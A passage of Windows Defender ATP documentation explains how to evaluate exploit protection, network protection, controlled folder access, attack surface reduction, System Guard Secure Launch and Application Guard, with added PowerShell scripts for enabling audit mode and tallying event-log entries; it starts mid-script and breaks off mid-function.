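foreach ($Allow in $Allows) {
    $AppPath = $Allow.FriendlyName -replace ' Hash .*$', ''
    if ($BlockedApps -contains $AppPath) {
        $RuleId = $Allow.ID
        foreach ($Ref in @($Policy.SelectNodes("//p:FileRuleRef[@RuleID='$RuleId']", $ns))) {
            $Ref.ParentNode.RemoveChild($Ref) | Out-Null
        }
        $Allow.ParentNode.RemoveChild($Allow) | Out-Null
        "removed rule $RuleId for $AppPath"
    }
}
$Policy.Save($CIAuditPolicy)

# Merge the cleaned audit policy into the existing policy (next section), then
# convert the merged .xml into the binary form that is actually deployed.
Merge-CIPolicy -PolicyPaths $InitialPolicy, $CIAuditPolicy -OutputFilePath $MergedPolicy
ConvertFrom-CIPolicy -XmlFilePath $MergedPolicy -BinaryFilePath ($CIPolicyPath + "DeviceGuardPolicy.bin")
```

Review the "would be allowed" list before merging; anything on it that is not on your step 1 list belongs in $BlockedApps.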
Evaluate exploit protection
4/8/2019 • 3 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Exploit protection helps protect devices from malware that uses exploits to spread and infect other devices. It
consists of a number of mitigations that can be applied to either the operating system or an individual app. Many
of the features that were part of the Enhanced Mitigation Experience Toolkit (EMET) are included in exploit
protection.
This topic helps you enable exploit protection in audit mode and review related events in Event Viewer. You can
enable audit mode for certain app-level mitigations to see how they will work in a test environment. This lets you
see a record of what would have happened if you had enabled the mitigation in production. You can make sure it
doesn't affect your line-of-business apps, and see which suspicious or malicious events occur.

TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to see how exploit protection
works.

Enable exploit protection in audit mode
You can set mitigations in audit mode for specific programs either by using the Windows Security app or
PowerShell.
Windows Security app
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the App & browser control tile (or the app icon on the left menu bar) and then click Exploit
protection.
3. Go to Program settings and choose the app you want to apply mitigations to:
a. If the app you want to configure is already listed, click it and then click Edit
b. If the app is not listed, at the top of the list click Add program to customize and then choose how you
want to add the app:
Use Add by program name to have the mitigation applied to any running process with that
name. You must specify a file with an extension. You can enter a full path to limit the mitigation to
only the app with that name in that location.
Use Choose exact file path to use a standard Windows Explorer file picker window to find and
select the file you want.
4. After selecting the app, you'll see a list of all the mitigations that can be applied. Choosing Audit will apply
the mitigation in audit mode only. You will be notified if you need to restart the process or app, or if you
need to restart Windows.
5. Repeat this for all the apps and mitigations you want to configure. Click Apply when you're done setting
up your configuration.
PowerShell
To set app-level mitigations to audit mode, use Set-ProcessMitigation with the audit-mode option of each
mitigation. Configure each mitigation in the following format:

Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>

Where:
<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify the app's executable after
this flag.
<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation
<Mitigation>:
The mitigation's audit-mode option as defined in the following table. Each mitigation is separated with a comma.

MITIGATION | AUDIT MODE CMDLET
Arbitrary code guard (ACG) | AuditDynamicCode
Block low integrity images | AuditImageLoad
Block untrusted fonts | AuditFont, FontAuditOnly
Code integrity guard | AuditMicrosoftSigned, AuditStoreSigned
Disable Win32k system calls | AuditSystemCall
Do not allow child processes | AuditChildProcess

For example, to enable Arbitrary Code Guard (ACG) in audit mode for an app named testing.exe, run the
following command:

Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable AuditDynamicCode

You can disable audit mode by replacing -Enable with -Disable.

Review exploit protection audit events
To review which apps would have been blocked, open Event Viewer and filter for the following events in the
Security-Mitigations log.

FEATURE | PROVIDER/SOURCE | EVENT ID | DESCRIPTION
Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 1 | ACG audit
Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 3 | Do not allow child processes audit
Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 5 | Block low integrity images audit
Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 7 | Block remote images audit
Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 9 | Disable win32k system calls audit
Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 11 | Code integrity guard audit
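The script below is an added example, not part of the original topic: it puts every mitigation from the table into audit mode for one line-of-business app with Set-ProcessMitigation, reads the setting back, and then tallies the audit events listed above so you can see which audits would have become blocks. The app path is a placeholder, and the two log names are assumed to be the channels behind the "Security-Mitigations (Kernel Mode/User Mode)" source.

```powershell
# Added example (not from the original page). Run from an elevated session.
# Assumptions: C:\apps\lob\tests\testing.exe is a placeholder executable;
# the KernelMode/UserMode log names back the provider shown in the table.

$App = 'C:\apps\lob\tests\testing.exe'   # placeholder LOB executable

# Audit-mode options from the table on this page, one entry per mitigation.
$AuditOptions = @(
    'AuditDynamicCode',                           # Arbitrary code guard (ACG)
    'AuditImageLoad',                             # Block low integrity images
    'AuditFont', 'FontAuditOnly',                 # Block untrusted fonts
    'AuditMicrosoftSigned', 'AuditStoreSigned',   # Code integrity guard
    'AuditSystemCall',                            # Disable Win32k system calls
    'AuditChildProcess'                           # Do not allow child processes
)

# Several options can be passed at once, comma-separated, as the format line
# in the PowerShell section describes.
Set-ProcessMitigation -Name $App -Enable $AuditOptions

# Read the configuration back so the evaluation starts from a known state.
Get-ProcessMitigation -Name $App | Format-List

# Event IDs from the table above, mapped to the mitigation each one audits.
$AuditEvents = @{
    1  = 'ACG audit'
    3  = 'Do not allow child processes audit'
    5  = 'Block low integrity images audit'
    7  = 'Block remote images audit'
    9  = 'Disable win32k system calls audit'
    11 = 'Code integrity guard audit'
}

$Logs = @(
    'Microsoft-Windows-Security-Mitigations/KernelMode',
    'Microsoft-Windows-Security-Mitigations/UserMode'
)

# Collect the last 24 hours of audit events. -ErrorAction keeps an empty log
# from being reported as an error by Get-WinEvent.
$Since  = (Get-Date).AddDays(-1)
$Events = foreach ($Log in $Logs) {
    Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = $Log
        Id        = @($AuditEvents.Keys)
        StartTime = $Since
    }
}

# One row per mitigation with a hit count: each hit is something that would
# have been blocked if -Enable had been given the enforcing option instead.
$Events |
    Group-Object Id |
    ForEach-Object {
        [pscustomobject]@{
            EventId    = [int]$_.Name
            Mitigation = $AuditEvents[[int]$_.Name]
            Count      = $_.Count
        }
    } |
    Sort-Object EventId |
    Format-Table -AutoSize

# The full messages name the process that triggered each audit; keep them for
# the review of which apps need an exception.
$Events | Select-Object TimeCreated, Id, Message | Format-List
```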

Related topics
Comparison with Enhanced Mitigation Experience Toolkit
Enable exploit protection
Configure and audit exploit protection mitigations
Import, export, and deploy exploit protection configurations
Troubleshoot exploit protection
Enable network protection
Enable controlled folder access
Enable attack surface reduction
Evaluate network protection
4/8/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Network protection helps prevent employees from using any application to access dangerous domains that may
host phishing scams, exploits, and other malicious content on the Internet.
This topic helps you evaluate network protection by enabling the feature and guiding you to a testing site. The
sites used in this evaluation topic are not malicious; they are specially created websites that pretend to be
malicious. The site will replicate the behavior that would happen if a user visited a malicious site or domain.

TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to see how other protection
features work.

Enable network protection in audit mode
You can enable network protection in audit mode to see which IP addresses and domains would have been
blocked if it was enabled.
You might want to do this to make sure it doesn't affect line-of-business apps or to get an idea of how often blocks
occur.
1. Type powershell in the Start menu, right click Windows PowerShell and click Run as administrator
2. Enter the following cmdlet:

Set-MpPreference -EnableNetworkProtection AuditMode

Visit a (fake) malicious domain
1. Open Internet Explorer, Google Chrome, or any other browser of your choice.
2. Go to https://smartscreentestratings2.net.
The network connection will be allowed and a test message will be displayed.
Review network protection events in Windows Event Viewer
To review apps that would have been blocked, open Event Viewer and filter for Event ID 1125 in the Microsoft-
Windows-Windows-Defender/Operational log. The following table lists all network protection events.

EVENT ID | PROVIDER/SOURCE | DESCRIPTION
5007 | Windows Defender (Operational) | Event when settings are changed
1125 | Windows Defender (Operational) | Event when a network connection is audited
1126 | Windows Defender (Operational) | Event when a network connection is blocked

Related topics
Windows Defender Exploit Guard
Network protection
Enable network protection
Troubleshoot network protection
Evaluate controlled folder access
4/18/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Controlled folder access is a feature that helps protect your documents and files from modification by suspicious
or malicious apps. Controlled folder access is supported on Windows Server 2019 as well as Windows 10 clients.
It is especially useful in helping to protect your documents and information from ransomware that can attempt to
encrypt your files and hold them hostage.
This topic helps you evaluate controlled folder access. It explains how to enable audit mode so you can test the
feature directly in your organization.

TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working
and see how it works.

Use audit mode to measure impact
You can enable the controlled folder access feature in audit mode. This lets you see a record of what would have
happened if you had enabled the setting.
You might want to do this when testing how the feature will work in your organization, to ensure it doesn't affect
your line-of-business apps, and to get an idea of how many suspicious file modification attempts generally occur
over a certain period.
To enable audit mode, use the following PowerShell cmdlet:

Set-MpPreference -EnableControlledFolderAccess AuditMode

TIP
If you want to fully audit how controlled folder access will work in your organization, you'll need to use a management tool
to deploy this setting to machines in your network(s). You can also use Group Policy, Intune, MDM, or System Center
Configuration Manager to configure and deploy the setting, as described in the main controlled folder access topic.

Review controlled folder access events in Windows Event Viewer
The following controlled folder access events appear in Windows Event Viewer.

EVENT ID | DESCRIPTION
5007 | Event when settings are changed
1124 | Audited controlled folder access event
1123 | Blocked controlled folder access event

Customize protected folders and apps
During your evaluation, you may wish to add to the list of protected folders, or allow certain apps to modify files.
See Protect important folders with controlled folder access for configuring the feature with management tools,
including Group Policy, PowerShell, and MDM CSP.

Related topics
Protect important folders with controlled folder access
Evaluate Windows Defender ATP
Use audit mode
Evaluate attack surface reduction rules
4/26/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Attack surface reduction rules help prevent actions and apps that are typically used by exploit-seeking malware to
infect machines. Attack surface reduction rules are supported on Windows Server 2019 as well as Windows 10
clients.
This topic helps you evaluate attack surface reduction rules. It explains how to enable audit mode so you can test
the feature directly in your organization.

TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working
and see how it works.

Use audit mode to measure impact
You can enable attack surface reduction rules in audit mode. This lets you see a record of what apps would have
been blocked if you had enabled attack surface reduction rules.
You might want to do this when testing how the feature will work in your organization, to ensure it doesn't affect
your line-of-business apps, and to get an idea of how often the rules will fire during normal use.
To enable audit mode, use the following PowerShell cmdlet:

Set-MpPreference -AttackSurfaceReductionRules_Actions AuditMode

This enables all attack surface reduction rules in audit mode.

TIP
If you want to fully audit how attack surface reduction rules will work in your organization, you'll need to use a management
tool to deploy this setting to machines in your network(s). You can also use Group Policy, Intune, or MDM CSPs to
configure and deploy the setting, as described in the main Attack surface reduction rules topic.

Review attack surface reduction events in Windows Event Viewer
To review apps that would have been blocked, open Event Viewer and filter for Event ID 1121 in the Microsoft-
Windows-Windows-Defender/Operational log. The following table lists all attack surface reduction events.

EVENT ID | DESCRIPTION
5007 | Event when settings are changed
1121 | Event when an attack surface reduction rule fires in block mode
1122 | Event when an attack surface reduction rule fires in audit mode
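As an added example for the three audit-mode evaluations above (network protection, controlled folder access and attack surface reduction rules; not part of the original topics), the script below switches all three features to audit mode with the cmdlets shown in those sections and then tallies the event IDs from their tables, separating audit hits from actual blocks. It assumes an elevated session and that the events are read from the "Microsoft-Windows-Windows Defender/Operational" channel, the Windows Defender (Operational) source named in the tables.

```powershell
# Added example (not from the original page). Run from an elevated session.
# Assumption: the Operational channel name below is the one behind the
# "Windows Defender (Operational)" source in this page's tables.

# 1. Put the three features into audit mode (the cmdlets from each section).
Set-MpPreference -EnableNetworkProtection AuditMode
Set-MpPreference -EnableControlledFolderAccess AuditMode
Set-MpPreference -AttackSurfaceReductionRules_Actions AuditMode

# 2. Confirm the resulting configuration before trusting the event counts.
Get-MpPreference |
    Select-Object EnableNetworkProtection, EnableControlledFolderAccess,
                  AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions |
    Format-List

# 3. Event IDs from the three tables, with the feature and mode each one means.
$DefenderEvents = @{
    5007 = @{ Feature = 'Settings';                 Mode = 'Changed' }
    1125 = @{ Feature = 'Network protection';       Mode = 'Audit'   }
    1126 = @{ Feature = 'Network protection';       Mode = 'Block'   }
    1124 = @{ Feature = 'Controlled folder access'; Mode = 'Audit'   }
    1123 = @{ Feature = 'Controlled folder access'; Mode = 'Block'   }
    1122 = @{ Feature = 'Attack surface reduction'; Mode = 'Audit'   }
    1121 = @{ Feature = 'Attack surface reduction'; Mode = 'Block'   }
}

$LogName = 'Microsoft-Windows-Windows Defender/Operational'

function Get-DefenderAuditSummary {
    param([datetime]$Since = (Get-Date).AddDays(-7))

    $Events = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = $LogName
        Id        = @($DefenderEvents.Keys)
        StartTime = $Since
    }

    # Count per feature and mode. During a pure audit-mode evaluation the Block
    # rows should stay at zero; a non-zero Block count means the machine is
    # already enforcing, so its LOB-impact numbers are not representative.
    $Events |
        Group-Object Id |
        ForEach-Object {
            $Info = $DefenderEvents[[int]$_.Name]
            [pscustomobject]@{
                EventId = [int]$_.Name
                Feature = $Info.Feature
                Mode    = $Info.Mode
                Count   = $_.Count
            }
        } |
        Sort-Object Feature, Mode
}

Get-DefenderAuditSummary | Format-Table -AutoSize

# 4. Detail view of the audit events only. The messages carry the app and, per
# feature, the domain or IP address, the protected folder, or the rule that
# fired, which is the input for your exclusion and allow-list review.
Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName   = $LogName
    Id        = 1125, 1124, 1122
    StartTime = (Get-Date).AddDays(-7)
} | Select-Object TimeCreated, Id, Message | Format-List
```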

Customize attack surface reduction rules
During your evaluation, you may wish to configure each rule individually or exclude certain files and processes
from being evaluated by the feature.
See the Customize attack surface reduction rules topic for information on configuring the feature with
management tools, including Group Policy and MDM CSP policies.

Related topics
Reduce attack surfaces with attack surface reduction rules
Evaluate Windows Defender Exploit Guard
Use audit mode to evaluate Windows Defender Exploit Guard
Evaluating Windows Defender Firewall with Advanced Security Design Examples
4/5/2019 • 2 minutes to read • Edit Online

Applies to
Windows 10
Windows Server 2016
The following Windows Defender Firewall with Advanced Security design examples illustrate how you can use
Windows Defender Firewall to improve the security of the devices connected to the network. You can use these
topics to evaluate how the firewall and connection security rules work across all Windows Defender Firewall
designs and to determine which design or combination of designs best suits the goals of your organization.
Firewall Policy with Advanced Security Design Example
Domain Isolation Policy Design Example
Server Isolation Policy Design Example
Certificate-based Isolation Policy Design Example
Evaluate Windows Defender Antivirus
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Use this guide to determine how well Windows Defender Antivirus protects you from viruses, malware, and
potentially unwanted applications.

TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the following features are
working and see how they work:
Cloud-delivered protection
Fast learning (including Block at first sight)
Potentially unwanted application blocking

It explains the important next generation protection features of Windows Defender Antivirus available for both
small and large enterprises, and how they increase malware detection and protection across your network.
You can choose to configure and evaluate each setting independently, or all at once. We have grouped similar
settings based upon typical evaluation scenarios, and include instructions for using PowerShell to enable the
settings.
The guide is available in PDF format for offline viewing:
Download the guide in PDF format
You can also download a PowerShell script that will enable all the settings described in the guide automatically. You
can obtain the script alongside the PDF download above, or individually from PowerShell Gallery:
Download the PowerShell script to automatically configure the settings

IMPORTANT
The guide is currently intended for single-machine evaluation of Windows Defender Antivirus. Enabling all of the settings in
this guide may not be suitable for real-world deployment.
For the latest recommendations for real-world deployment and monitoring of Windows Defender Antivirus across a
network, see Deploy Windows Defender Antivirus.

Related topics
Windows Defender Antivirus in Windows 10
Deploy Windows Defender Antivirus
Access the Windows Defender ATP Community Center
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
The Windows Defender ATP Community Center is a place where community members can learn, collaborate, and
share experiences about the product.
There are several spaces you can explore to learn about specific information:
Announcements
What's new
Threat Intelligence
There are several ways you can access the Community Center:
In the Windows Defender Security Center navigation pane, select Community center. A new browser tab
opens and takes you to the Windows Defender ATP Tech Community page.
Access the community through the Windows Defender Advanced Threat Protection Tech Community page
You can instantly view and read conversations that have been posted in the community.
To get the full experience within the community such as being able to comment on posts, you'll need to join the
community. For more information on how to get started in the Microsoft Tech Community, see Microsoft Tech
Community: Getting Started.
Configure and manage Windows Defender ATP capabilities
4/30/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Configure and manage all the Windows Defender ATP capabilities to get the best security protection for your
organization.

In this section
TOPIC | DESCRIPTION
Configure attack surface reduction capabilities | By ensuring configuration settings are properly set and exploit
  mitigation techniques are applied, this set of capabilities resists attacks and exploitation.
Configure next generation protection | Configure next generation protection to catch all types of emerging
  threats.
Configure Secure score dashboard security controls | Configure the security controls in Secure score to increase
  the security posture of your organization.
Configure Microsoft Threat Experts capabilities | Configure and manage how you would like to get cybersecurity
  threat intelligence from Microsoft Threat Experts.
Configure Microsoft Threat Protection integration | Configure other solutions that integrate with Windows
  Defender ATP.
Management and API support | Pull alerts to your SIEM or use APIs to create custom alerts. Create and build
  Power BI reports.
Configure Windows Defender Security Center settings | Configure portal related settings such as general
  settings, advanced features, enable the preview experience and others.
Configure attack surface reduction
4/5/2019 • 2 minutes to read • Edit Online

You can configure attack surface reduction with a number of tools, including:
Microsoft Intune
System Center Configuration Manager
Group Policy
PowerShell cmdlets
The topics in this section describe how to configure attack surface reduction. Each topic includes instructions for
the applicable configuration tool (or tools).

In this section
TOPIC | DESCRIPTION
Enable hardware-based isolation for Microsoft Edge | How to prepare for and install Application Guard,
  including hardware and software requirements
Enable application control | How to control applications run by users and protect kernel mode processes
Exploit protection | How to automatically apply exploit mitigation techniques on both operating system
  processes and on individual apps
Network protection | How to prevent users from using any apps to access dangerous domains
Controlled folder access | How to protect valuable data from malicious apps
Attack surface reduction | How to prevent actions and apps that are typically used by exploit-seeking malware
Network firewall | How to protect devices and data across a network


System Guard Secure Launch and SMM protection
4/5/2019 • 4 minutes to read • Edit Online

This topic explains how to configure System Guard Secure Launch and System Management Mode (SMM)
protection to improve the startup security of Windows 10 devices. The information below is presented from a
client perspective.

How to enable System Guard Secure Launch
You can enable System Guard Secure Launch by using any of these options:
Mobile Device Management (MDM)
Group Policy
Windows Security Center
Registry
Mobile Device Management
System Guard Secure Launch can be configured for Mobile Device Management (MDM) by using DeviceGuard
policies in the Policy CSP, specifically DeviceGuard/ConfigureSystemGuardLaunch.
Group Policy
1. Click Start > type and then click Edit group policy.
2. Click Computer Configuration > Administrative Templates > System > Device Guard > Turn On
Virtualization Based Security > Secure Launch Configuration.

Windows Security Center
Click Start > Settings > Update & Security > Windows Security > Open Windows Security > Device
security > Core isolation > Firmware protection.

Registry
1. Open Registry editor.
2. Click HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > DeviceGuard > Scenarios.
3. Right-click Scenarios > New > Key and name the new key SystemGuard.
4. Right-click SystemGuard > New > DWORD (32-bit) Value and name the new DWORD Enabled.
5. Double-click Enabled, change the value to 1, and click OK.
How to verify System Guard Secure Launch is configured and running
To verify that Secure Launch is running, use System Information (MSInfo32). Click Start, search for System
Information, and look under Virtualization-based Security Services Running and Virtualization-based
Security Services Configured.
NOTE
To enable System Guard Secure launch, the platform must meet all the baseline requirements for Device Guard, Credential
Guard, and Virtualization Based Security.
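The script below is an added example, not part of the original topic: it performs the Registry steps above from PowerShell and then verifies the result the way System Information does, by reading the Win32_DeviceGuard class. It assumes that class (namespace root\Microsoft\Windows\DeviceGuard) backs the MSInfo32 entries, and that the value 3 in its SecurityServicesConfigured and SecurityServicesRunning arrays denotes System Guard Secure Launch (1 = Credential Guard, 2 = HVCI, 4 = SMM firmware measurement); that mapping is taken from the class documentation, not from this page.

```powershell
# Added example (not from the original page). Run from an elevated session.
# Assumptions: Win32_DeviceGuard is the class behind the MSInfo32 entries;
# service code 3 means System Guard Secure Launch;
# VirtualizationBasedSecurityStatus 2 means VBS is enabled and running.

$KeyPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\SystemGuard'

function Enable-SystemGuardSecureLaunch {
    # Registry steps 2 to 5: create the SystemGuard key under Scenarios and
    # set the Enabled DWORD to 1.
    if (-not (Test-Path $KeyPath)) {
        New-Item -Path $KeyPath -Force | Out-Null
    }
    New-ItemProperty -Path $KeyPath -Name 'Enabled' -PropertyType DWord -Value 1 -Force | Out-Null
    (Get-ItemProperty -Path $KeyPath -Name 'Enabled').Enabled
}

function Get-SystemGuardState {
    $SecureLaunch = 3
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
    $enabled = (Get-ItemProperty -Path $KeyPath -Name 'Enabled' -ErrorAction SilentlyContinue).Enabled

    [pscustomobject]@{
        RegistryEnabled = ($enabled -eq 1)
        # "Virtualization-based Security Services Configured" in MSInfo32
        Configured      = [bool]($dg.SecurityServicesConfigured -contains $SecureLaunch)
        # "Virtualization-based Security Services Running" in MSInfo32
        Running         = [bool]($dg.SecurityServicesRunning -contains $SecureLaunch)
        # VBS itself must be running for Secure Launch to run (see the NOTE above)
        VbsRunning      = ($dg.VirtualizationBasedSecurityStatus -eq 2)
    }
}

Enable-SystemGuardSecureLaunch | Out-Null
$State = Get-SystemGuardState
$State | Format-List

# Configured-but-not-running after a restart points at one of the baseline
# requirements (Device Guard, Credential Guard, VBS) not being met on the platform.
if ($State.Configured -and -not $State.Running) {
    Write-Warning 'Secure Launch is configured but not running; restart, then re-check the platform baseline requirements.'
}
```

The registry change takes effect after a restart, so run Get-SystemGuardState again afterwards to confirm the Running column.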

Requirements Met by System Guard Enabled Machines
Any machine with System Guard enabled will automatically meet the following low-level hardware requirements:

FOR INTEL® VPRO™ PROCESSORS STARTING WITH INTEL® COFFEELAKE, WHISKEYLAKE, OR LATER SILICON | DESCRIPTION

64-bit CPU | A 64-bit computer with minimum 4 cores (logical processors) is required for hypervisor and
  virtualization-based security (VBS). For more info about Hyper-V, see Hyper-V on Windows Server 2016 or
  Introduction to Hyper-V on Windows 10. For more info about hypervisor, see Hypervisor Specifications.

Trusted Platform Module (TPM) 2.0 | Platforms must support a discrete TPM 2.0. Integrated/firmware TPMs are not
  supported.

Windows DMA Protection | Platforms must meet the Windows DMA Protection Specification (all external DMA ports
  must be off by default until the OS explicitly powers them).

SMM communication buffers | All SMM communication buffers must be implemented in EfiRuntimeServicesData,
  EfiRuntimeServicesCode, EfiACPIMemoryNVS, or EfiReservedMemoryType memory types.

SMM Page Tables | Must NOT contain any mappings to EfiConventionalMemory (e.g. no OS/VMM owned memory).
  Must NOT contain any mappings to code sections within EfiRuntimeServicesCode.
  Must NOT have execute and write permissions for the same page.
  Must allow ONLY that TSEG pages can be marked executable and the memory map must report TSEG as
  EfiReservedMemoryType.
  BIOS SMI handler must be implemented such that SMM page tables are locked on every SMM entry.

Modern/Connected Standby | Platforms must support Modern/Connected Standby.

TPM AUX Index | Platform must set up an AUX index with index, attributes, and policy that exactly corresponds to
  the AUX index specified in the TXT DG with a data size of exactly 104 bytes (for SHA256 AUX data).
  (NameAlg = SHA256)
  Platforms must set up a PS (Platform Supplier) index with:
    Exactly the "TXT PS2" style Attributes on creation as follows: AuthWrite, PolicyDelete, WriteLocked,
    WriteDefine, AuthRead, WriteDefine, NoDa, Written, PlatformCreate
    A policy of exactly PolicyCommandCode(CC = TPM2_CC_UndefineSpaceSpecial) (SHA256 NameAlg and Policy)
    Size of exactly 70 bytes
    NameAlg = SHA256
    In addition, it must have been initialized and locked (TPMA_NV_WRITTEN = 1, TPMA_NV_WRITELOCKED = 1) at
    time of OS launch.
  PS index data DataRevocationCounters, SINITMinVersion, and PolicyControl must all be 0x00

AUX Policy | The required AUX policy must be as follows:
  A = TPM2_PolicyLocality (Locality 3 & Locality 4)
  B = TPM2_PolicyCommandCode (TPM_CC_NV_UndefineSpecial)
  authPolicy = {A} OR {{A} AND {B}}
  authPolicy digest = 0xef, 0x9a, 0x26, 0xfc, 0x22, 0xd1, 0xae, 0x8c, 0xec, 0xff, 0x59, 0xe9, 0x48, 0x1a, 0xc1,
  0xec, 0x53, 0x3d, 0xbe, 0x22, 0x8b, 0xec, 0x6d, 0x17, 0x93, 0x0f, 0x4c, 0xb2, 0xcc, 0x5b, 0x97, 0x24

Platform firmware | Platform firmware must carry all code required to execute an Intel® Trusted Execution
  Technology secure launch:
  Intel® SINIT ACM must be carried in the OEM BIOS
  Platforms must ship with a production ACM signed by the correct production Intel® ACM signer for the platform

Platform firmware update | System firmware is recommended to be updated via UpdateCapsule in Windows Update.

FOR QUALCOMM® PROCESSORS WITH SD850 OR LATER CHIPSETS | DESCRIPTION

Monitor Mode Communication | All Monitor Mode communication buffers must be implemented in either
  EfiRuntimeServicesData (recommended), data sections of EfiRuntimeServicesCode as described by the Memory
  Attributes Table, EfiACPIMemoryNVS, or EfiReservedMemoryType memory types

Monitor Mode Page Tables | All Monitor Mode page tables must:
  NOT contain any mappings to EfiConventionalMemory (e.g. no OS/VMM owned memory)
  They must NOT have execute and write permissions for the same page
  Platforms must only allow Monitor Mode pages marked as executable
  The memory map must report Monitor Mode as EfiReservedMemoryType
  Platforms must provide a mechanism to protect the Monitor Mode page tables from modification

Modern/Connected Standby | Platforms must support Modern/Connected Standby.

Platform firmware | Platform firmware must carry all code required to perform a launch.

Platform firmware update | System firmware is recommended to be updated via UpdateCapsule in Windows Update.
Prepare to install Windows Defender Application Guard
4/8/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Review system requirements

NOTE
Windows Defender Application Guard is not supported on VMs and VDI environments. For testing and automation on
non-production machines, you may enable WDAG on a VM by enabling Hyper-V nested virtualization on the host.

Hardware requirements
Your environment needs the following hardware to run Windows Defender Application Guard.

HARDWARE | DESCRIPTION
64-bit CPU | A 64-bit computer with minimum 4 cores is required for the hypervisor. For more info about Hyper-V,
  see Hyper-V on Windows Server 2016 or Introduction to Hyper-V on Windows 10. For more info about hypervisor,
  see Hypervisor Specifications.
CPU virtualization extensions | Extended page tables, also called Second Level Address Translation (SLAT)
  -AND-
  One of the following virtualization extensions for VBS: VT-x (Intel) -OR- AMD-V
Hardware memory | Microsoft requires a minimum of 8GB RAM
Hard disk | 5 GB free space, solid state disk (SSD) recommended
Input/Output Memory Management Unit (IOMMU) support | Not required, but strongly recommended

Software requirements
Your environment needs the following software to run Windows Defender Application Guard.
SOFTWARE | DESCRIPTION
Operating system | Windows 10 Enterprise edition, version 1709 or higher
  Windows 10 Professional edition, version 1803
Browser | Microsoft Edge and Internet Explorer
Management system (only for managed devices) | Microsoft Intune
  -OR-
  System Center Configuration Manager
  -OR-
  Group Policy
  -OR-
  Your current company-wide 3rd party mobile device management (MDM) solution. For info about 3rd party MDM
  solutions, see the documentation that came with your product.

Prepare for Windows Defender Application Guard
Before you can install and use Windows Defender Application Guard, you must determine which way you intend
to use it in your enterprise. You can use Application Guard in either Standalone or Enterprise-managed mode.
Standalone mode
Applies to:
Windows 10 Enterprise edition, version 1709 or higher
Windows 10 Pro edition, version 1803
Employees can use hardware-isolated browsing sessions without any administrator or management policy
configuration. In this mode, you must install Application Guard and then the employee must manually start
Microsoft Edge in Application Guard while browsing untrusted sites. For an example of how this works, see the
Application Guard in standalone mode testing scenario.
Enterprise-managed mode
Applies to:
Windows 10 Enterprise edition, version 1709 or higher
You and your security department can define your corporate boundaries by explicitly adding trusted domains and
by customizing the Application Guard experience to meet and enforce your needs on employee devices.
Enterprise-managed mode also automatically redirects any browser requests to add non-enterprise domain(s) in
the container.
The following diagram shows the flow between the host PC and the isolated container.
Install Application Guard
Application Guard functionality is turned off by default. However, you can quickly install it on your employee's
devices through the Control Panel, PowerShell, or your mobile device management (MDM) solution.
To install by using the Control Panel
1. Open the Control Panel, click Programs, and then click Turn Windows features on or off.
2. Select the check box next to Windows Defender Application Guard and then click OK.
Application Guard and its underlying dependencies are all installed.
To install by using PowerShell

NOTE
Ensure your devices have met all system requirements prior to this step. PowerShell will install the feature without checking
system requirements. If your devices don't meet the system requirements, Application Guard may not work. This step is
recommended for enterprise managed scenarios only.

1. Click the Search or Cortana icon in the Windows 10 taskbar and type PowerShell.
2. Right-click Windows PowerShell, and then click Run as administrator.
Windows PowerShell opens with administrator credentials.
3. Type the following command:

Enable-WindowsOptionalFeature -online -FeatureName Windows-Defender-ApplicationGuard

4. Restart the device.


Application Guard and its underlying dependencies are all installed.
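The NOTE above warns that the PowerShell path installs the feature without checking system requirements. The following script is an added example, not part of the Microsoft documentation: it checks the requirements the article lists (64-bit Windows 10 Enterprise 1709+ or Pro 1803+, virtualization extensions, SLAT, virtualization enabled in firmware) through Get-ComputerInfo, and only then enables the optional feature. The property names come from Get-ComputerInfo; the version and edition thresholds are taken from the "Applies to" lines above.

```powershell
# Added example (not part of the Microsoft documentation): check the system
# requirements that the PowerShell install path skips, then enable the
# Application Guard feature only when they are met. Run from an elevated
# PowerShell session on the target device.

function Test-WdagPrerequisites {
    # Get-ComputerInfo exposes the Hyper-V requirement checks; Application Guard
    # needs 64-bit Windows 10 Enterprise/Pro with virtualization extensions,
    # SLAT and virtualization enabled in firmware.
    $ci = Get-ComputerInfo -Property OsName, OsArchitecture, WindowsVersion,
        HyperVisorPresent,
        HyperVRequirementVirtualizationFirmwareEnabled,
        HyperVRequirementSecondLevelAddressTranslation,
        HyperVRequirementVMMonitorModeExtensions

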